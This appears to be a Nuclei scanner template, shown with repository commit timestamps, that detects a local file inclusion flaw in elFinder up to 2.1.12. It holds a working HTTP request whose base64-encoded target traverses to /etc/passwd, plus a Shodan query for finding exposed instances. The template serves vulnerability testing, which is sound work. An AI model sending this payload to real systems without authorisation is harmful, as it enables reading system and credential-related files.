nuclei-templates/http/vulnerabilities/other/elFinder-path-traversal.yaml

37 lines
1.1 KiB
YAML
Raw Normal View History

2022-07-05 03:10:51 +00:00
id: elFinder-path-traversal
info:
name: elFinder <=2.1.12 - Local File Inclusion
2022-07-05 03:10:51 +00:00
author: ritikchaddha
severity: high
description: |
elFinder through 2.1.12 is vulnerable to local file inclusion via Connector.minimal.php in std42. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
2022-07-05 03:10:51 +00:00
reference:
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
metadata:
max-request: 1
2022-07-05 03:10:51 +00:00
verified: true
shodan-query: title:"elfinder"
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
2022-07-05 03:10:51 +00:00
tags: lfi,elfinder
http:
2022-07-05 03:10:51 +00:00
- raw:
- |
GET /php/connector.minimal.php?cmd=file&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk&download=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200